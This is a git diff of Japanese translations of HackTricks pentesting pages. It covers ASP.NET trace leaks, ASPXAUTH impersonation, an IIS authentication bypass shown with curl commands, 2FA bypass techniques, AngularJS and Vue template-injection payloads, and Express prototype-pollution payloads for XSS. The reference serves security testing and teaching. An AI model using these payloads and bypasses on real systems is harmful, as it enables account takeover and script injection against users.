これは、一定期間にわたってアプリケーションに対して行われたすべてのリクエストの非常に詳細なログを保持します。
|
||||
|
||||
この情報には、リモートクライアントのIP、セッションID、すべてのリクエストとレスポンスのクッキー、物理パス、ソースコード情報、そして潜在的にユーザー名とパスワードさえ含まれる可能性があります。
|
||||
この情報には、リモートクライアントのIP、セッションID、すべてのリクエストとレスポンスのクッキー、物理パス、ソースコード情報、そして潜在的にはユーザー名とパスワードさえ含まれる可能性があります。
|
||||
|
||||
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
|
||||
|
||||
|
@ -257,14 +257,14 @@ ASPXAUTHは以下の情報を使用します:
|
|||
* **`validationKey`**(文字列):署名検証に使用する16進数エンコードされたキー。
|
||||
* **`decryptionMethod`**(文字列):(デフォルトは“AES”)。
|
||||
* **`decryptionIV`**(文字列):16進数エンコードされた初期化ベクトル(ゼロのベクトルがデフォルト)。
|
||||
* **`decryptionKey`**(文字列):復号に使用する16進数エンコードされたキー。
|
||||
* **`decryptionKey`**(文字列):復号化に使用する16進数エンコードされたキー。
|
||||
|
||||
ただし、これらのパラメータの**デフォルト値**を使用し、**ユーザーのメールをクッキーとして使用**する人もいます。したがって、攻撃対象のサーバーで**希望のユーザーのメールを持つユーザーを作成**し、ASPXAUTHクッキーを**第二のサーバーから第一のサーバーに使用**してユーザーを偽装することができるかもしれません。\
|
||||
ただし、これらのパラメータの**デフォルト値**を使用し、**ユーザーのメールをクッキーとして使用**する人もいます。したがって、攻撃対象のサーバーで**偽装したいユーザーのメールを持つユーザーを作成**し、ASPXAUTHクッキーを使用して第二のサーバーから第一のサーバーに**ユーザーを偽装**することができるかもしれません。\
|
||||
この攻撃はこの[**解説**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19)で成功しました。
|
||||
|
||||
## キャッシュされたパスワードを使用したIIS認証バイパス(CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
|
||||
## キャッシュされたパスワードを使用したIIS認証バイパス(CVE-2022-30209)<a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
|
||||
|
||||
[完全なレポートはこちら](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):コードのバグが、ユーザーが提供したパスワードを**適切にチェックしなかった**ため、**パスワードハッシュがすでにキャッシュにあるキーに一致する**攻撃者はそのユーザーとしてログインできるようになります。
|
||||
[完全なレポートはこちら](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html):コードのバグが、ユーザーが提供したパスワードを適切にチェックしなかったため、**パスワードハッシュがすでにキャッシュにあるキーに一致する**攻撃者はそのユーザーとしてログインできるようになります。
|
||||
```python
|
||||
# script for sanity check
|
||||
> type test.py
|
||||
|
@ -284,11 +284,11 @@ HTTP/1.1 401 Unauthorized
|
|||
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
|
||||
HTTP/1.1 200 OK
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業や顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -298,14 +298,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**を使って、ゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **をチェックしてください!**
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォローする。**
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**する。
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,27 +2,27 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong>を使って、ゼロからヒーローまでAWSハッキングを学びましょう!</summary>
|
||||
<summary><strong>htARTE(HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks をサポートする他の方法:
|
||||
|
||||
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)を入手
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 で **@carlospolopm** をフォローする [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **ハッキングテクニックを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する。
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) または [**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** をフォローする。**
|
||||
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出する。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックして、無料でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックし、無料でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -32,9 +32,9 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
### **直接エンドポイントアクセス**
|
||||
|
||||
2FAをバイパスするために、パスを知っている場合は、直接次のエンドポイントにアクセスします。失敗した場合は、**Referrerヘッダー**を変更して、2FA確認ページからのナビゲーションを模倣します。
|
||||
2FAをバイパスするには、パスを知っていることが重要であり、その後のエンドポイントに直接アクセスします。失敗した場合は、**Referrerヘッダー**を変更して、2FA確認ページからのナビゲーションを模倣します。
|
||||
|
||||
### **トークンの再利用**
|
||||
### **トークン再利用**
|
||||
|
||||
アカウント内で以前に使用したトークンを再利用することは効果的です。
|
||||
|
||||
|
@ -48,7 +48,7 @@ Webアプリケーションからのレスポンスでトークンが公開さ
|
|||
|
||||
### **検証リンクの悪用**
|
||||
|
||||
アカウント作成時に送信された**メール検証リンク**を使用すると、2FAなしでプロファイルにアクセスできる場合があります。詳細は[こちら](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)。
|
||||
アカウント作成時に送信された**電子メール検証リンク**を使用すると、2FAなしでプロファイルにアクセスできる場合があります。詳細は[こちら](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)。
|
||||
|
||||
### **セッション操作**
|
||||
|
||||
|
@ -60,7 +60,7 @@ Webアプリケーションからのレスポンスでトークンが公開さ
|
|||
|
||||
### **OAuthプラットフォームの侵害**
|
||||
|
||||
信頼された**OAuth**プラットフォーム(例:Google、Facebook)でユーザーアカウントを侵害することで、2FAをバイパスできる可能性があります。
|
||||
信頼された**OAuth**プラットフォーム(例:Google、Facebook)でユーザーアカウントを侵害することで、2FAをバイパスする経路が提供される場合があります。
|
||||
|
||||
### **ブルートフォース攻撃**
|
||||
|
||||
|
@ -70,9 +70,9 @@ Webアプリケーションからのレスポンスでトークンが公開さ
|
|||
|
||||
#### **遅いブルートフォース**
|
||||
|
||||
全体的なレート制限が存在しない場合、遅いブルートフォース攻撃が有効です。
|
||||
全体的なレート制限が存在する場合、遅いブルートフォース攻撃が有効です。
|
||||
|
||||
#### **コード再送信制限のリセット**
|
||||
#### **コード再送信リミットリセット**
|
||||
|
||||
コードを再送信すると、レート制限がリセットされ、継続的なブルートフォース試行が可能になります。
|
||||
|
||||
|
@ -90,11 +90,11 @@ SMS経由でコードを過剰に再送信すると、企業にコストがか
|
|||
|
||||
#### **無限OTP再生成**
|
||||
|
||||
簡単なコードを使って無限のOTP生成を行うことで、少数のコードを繰り返し試行することでブルートフォースが可能になります。
|
||||
簡単なコードを再試行することで、無限のOTP生成が可能になり、少数のコードを繰り返し試行することでブルートフォースが可能になります。
|
||||
|
||||
### **レースコンディションの悪用**
|
||||
|
||||
2FAバイパスのためのレースコンディションの悪用は、特定の文書に記載されています。
|
||||
2FAバイパスのためのレースコンディションの悪用は、特定の文書に見つかるかもしれません。
|
||||
|
||||
### **CSRF/Clickjackingの脆弱性**
|
||||
|
||||
|
@ -104,17 +104,17 @@ SMS経由でコードを過剰に再送信すると、企業にコストがか
|
|||
|
||||
#### **予測可能なCookie値**
|
||||
|
||||
"Remember me"クッキーの値を推測することで制限をバイパスできます。
|
||||
"Remember me"クッキーの値を推測することで制限をバイパスできる場合があります。
|
||||
|
||||
#### **IPアドレスなりすまし**
|
||||
|
||||
**X-Forwarded-For**ヘッダーを通じて被害者のIPアドレスをなりすますことで制限をバイパスできます。
|
||||
**X-Forwarded-For**ヘッダーを介して被害者のIPアドレスをなりすますことで制限をバイパスできます。
|
||||
|
||||
### **古いバージョンの利用**
|
||||
|
||||
#### **サブドメイン**
|
||||
|
||||
古い2FAサポートがない古いバージョンを使用するか、脆弱な2FA実装を含むサブドメインをテストすることができます。
|
||||
古い2FAサポートがないバージョンを使用するか、脆弱な2FA実装が含まれている可能性があるサブドメインをテストすることができます。
|
||||
|
||||
#### **APIエンドポイント**
|
||||
|
||||
|
@ -126,21 +126,33 @@ SMS経由でコードを過剰に再送信すると、企業にコストがか
|
|||
|
||||
### **バックアップコードのアクセス制御の欠陥**
|
||||
|
||||
2FAの有効化時にバックアップコードを即座に生成し、潜在的な未承認のバックアップコードの取得、特にCORSの誤構成/XSSの脆弱性がリスクをもたらす可能性があります。
|
||||
2FAの有効化時にバックアップコードを即座に生成し、潜在的な不正な取得を行うことは、特にCORSの誤構成/XSSの脆弱性がある場合にリスクを引き起こします。
|
||||
|
||||
### **2FAページでの情報漏洩**
|
||||
### **2FAページでの情報開示**
|
||||
|
||||
2FA確認ページでの機密情報漏洩(電話番号など)は懸念事項です。
|
||||
2FA確認ページでの機密情報開示(電話番号など)は懸念事項です。
|
||||
|
||||
### **パスワードリセットによる2FAの無効化**
|
||||
|
||||
アカウント作成、2FAの有効化、パスワードリセット、および2FA要件なしでのサブセクエントログインを含むプロセスは、潜在的なバイパス手法を示しています。
|
||||
アカウント作成、2FAの有効化、パスワードリセット、および2FA要件なしでの後続ログインを実証するプロセスは、潜在的なバイパス手法を示しています。
|
||||
|
||||
### **デコイリクエスト**
|
||||
|
||||
デコイリクエストを使用してブルートフォース試行を曖昧にしたり、レート制限メカニズムを誤認させたりすることで、バイパス戦略に別のレイヤーを追加できます。このようなリクエストを作成するには、アプリケーションのセキュリティ対策とレート制限の動作に対する微妙な理解が必要です。
|
||||
デコイリクエストを利用してブルートフォース試行を曖昧にしたり、レート制限メカニズムを誤誘導したりすることで、バイパス戦略に別のレイヤーを追加できます。このようなリクエストを作成するには、アプリケーションのセキュリティ対策とレート制限の動作について繊細な理解が必要です。
|
||||
|
||||
## 参考文献
|
||||
|
||||
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
|
||||
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックし、無料でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
|
|
@ -4,19 +4,19 @@
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
|
||||
- **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -28,13 +28,13 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
# 概要
|
||||
|
||||
これは**サーバーサイドテンプレートインジェクション**(SSTI)のようなものですが、**クライアント**側にあります。**SSTI**はリモートサーバーでコードを実行できる可能性がありますが、**CSTI**は被害者のブラウザで**任意のJavaScriptコードを実行**できる可能性があります。
|
||||
これは**サーバーサイドテンプレートインジェクション**(SSTI)のようなものですが、**クライアント**側で行われます。**SSTI**はリモートサーバーでコードを**実行**することができますが、**CSTI**は被害者のブラウザで**任意のJavaScript**コードを実行できる可能性があります。
|
||||
|
||||
この脆弱性の**テスト**は、**SSTI**の場合と非常に**類似**しています。インタプリタは**テンプレート**を期待し、それを実行します。たとえば、`{{ 7-7 }}`のようなペイロードを使用すると、アプリが**脆弱**であれば`0`が表示され、そうでなければ元の`{{ 7-7 }}`が表示されます。
|
||||
|
||||
# AngularJS
|
||||
|
||||
AngularJSは広く使用されているJavaScriptフレームワークで、**`ng-app`**などのディレクティブとして知られる属性を介してHTMLとやり取りします。このディレクティブにより、AngularJSはHTMLコンテンツを処理し、二重中括弧内のJavaScript式を実行できるようになります。
|
||||
AngularJSは広く使用されているJavaScriptフレームワークで、**`ng-app`**などのディレクティブとして知られる属性を介してHTMLとやり取りします。このディレクティブにより、AngularJSはHTMLコンテンツを処理し、二重中括弧内でJavaScript式を実行できるようにします。
|
||||
|
||||
ユーザー入力が`ng-app`でタグ付けされたHTML本文に動的に挿入されるシナリオでは、任意のJavaScriptコードを実行することが可能です。これは、入力内でAngularJSの構文を活用することで実現できます。以下は、JavaScriptコードを実行する方法を示す例です:
|
||||
```javascript
|
||||
|
@ -45,7 +45,7 @@ AngularJSは広く使用されているJavaScriptフレームワークで、**`n
|
|||
<!-- Google Research - AngularJS -->
|
||||
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
|
||||
```
|
||||
非常**基本的なオンライン例**は、[http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)で**AngularJS**の脆弱性を見つけることができます。また、**[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**でも確認できます。
|
||||
非常**基本的なオンライン例**は、[http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)や**[Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)**で**AngularJS**の脆弱性を見つけることができます。
|
||||
|
||||
{% hint style="danger" %}
|
||||
[**Angular 1.6はサンドボックスを削除しました**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.)ので、このバージョンから`{{constructor.constructor('alert(1)')()}}`や`<input ng-focus=$event.view.alert('XSS')>`のようなペイロードが機能するはずです。
|
||||
|
@ -53,10 +53,10 @@ AngularJSは広く使用されているJavaScriptフレームワークで、**`n
|
|||
|
||||
# VueJS
|
||||
|
||||
**脆弱なVue**の実装は、[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)で見つけることができます。\
|
||||
[https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)で**脆弱なVue**の実装を見つけることができます。\
|
||||
動作するペイロード: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
|
||||
|
||||
また、脆弱な例の**ソースコード**はこちらにあります: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
そして、脆弱な例の**ソースコード**はこちらです: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
```markup
|
||||
<!-- Google Research - Vue.js-->
|
||||
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
|
||||
|
@ -99,9 +99,9 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
|||
|
||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
|
||||
|
@ -113,14 +113,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローする。**
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有する。
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローする。**
|
||||
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -8,27 +8,27 @@ HackTricksをサポートする他の方法:
|
|||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)で**フォロー**する。
|
||||
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Serve XSS responses
|
||||
## XSSレスポンスを提供する
|
||||
|
||||
**詳細については、[元のリサーチを参照してください](https://portswigger.net/research/server-side-prototype-pollution)**
|
||||
|
||||
|
@ -42,15 +42,13 @@ _.merge({}, req.body);
|
|||
res.send(req.body);
|
||||
});
|
||||
```
|
||||
これらのケースでは、JSONコンテンツタイプでは通常XSSは起こりません。ただし、プロトタイプ汚染を利用すると、**Expressを混乱させてHTMLレスポンスを提供させることができます。** この脆弱性は、アプリケーションが**`res.send(obj)`**を使用し、application/jsonコンテンツタイプでボディパーサーを使用していることに依存しています。
|
||||
これらのケースでは、通常、JSONコンテンツタイプではXSSは可能ではありません。ただし、プロトタイプ汚染を使用すると、**Expressを混乱させてHTMLレスポンスを提供させることができます。** この脆弱性は、アプリケーションが**`res.send(obj)`**を使用し、application/jsonコンテンツタイプでボディパーサーを使用していることに依存しています。
|
||||
```json
|
||||
{"__proto__":{"_body":true,"body":"<script>evil()"}}
|
||||
```
|
||||
**`body`**と**`_body`**プロパティを**汚染**することで、**ExpressがHTMLコンテンツタイプを提供**し、_bodyプロパティを反映させ、保存されたXSSが発生する可能性があります。
|
||||
### レンダリングUTF7
|
||||
|
||||
### UTF7のレンダリング
|
||||
|
||||
Expressが**UTF-7コンテンツをレンダリングする**ことが可能です:
|
||||
ExpressがUTF-7コンテンツをレンダリングすることが可能です:
|
||||
```json
|
||||
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
|
||||
```
|
||||
|
@ -68,7 +66,7 @@ Expressが**UTF-7コンテンツをレンダリングする**ことが可能で
|
|||
```
|
||||
### 公開されたヘッダー
|
||||
|
||||
次のPPガジェットは、サーバーがHTTPヘッダー**`Access-Control-Expose_headers: foo`**を送信するようにします。
|
||||
次のPPガジェットは、サーバーがHTTPヘッダーを送信するようにします:**`Access-Control-Expose_headers: foo`**
|
||||
```json
|
||||
{"__proto__":{"exposedHeaders":["foo"]}}
|
||||
```
|
||||
|
@ -76,7 +74,7 @@ Expressが**UTF-7コンテンツをレンダリングする**ことが可能で
|
|||
|
||||
### **OPTIONSメソッド**
|
||||
|
||||
次のペイロードを使用すると、**OPTIONSレスポンスからメソッドを隠す**ことができます:
|
||||
次のペイロードを使用すると、**OPTIONSレスポンスからメソッドを隠す**ことが可能です:
|
||||
```javascript
|
||||
// Original reponse: POST,GET,HEAD
|
||||
|
||||
|
@ -93,14 +91,14 @@ Expressが**UTF-7コンテンツをレンダリングする**ことが可能で
|
|||
```
|
||||
### エラー
|
||||
|
||||
プロトタイプに文字列などのプリミティブを割り当てると、プロトタイプはオブジェクトである必要があるため、**no-op操作が生成**されます。`Object.prototype`にプロトタイプオブジェクトを割り当てようとすると、これは**例外をスロー**します。これら2つの動作を使用して、**プロトタイプ汚染が成功したかどうかを検出**できます。
|
||||
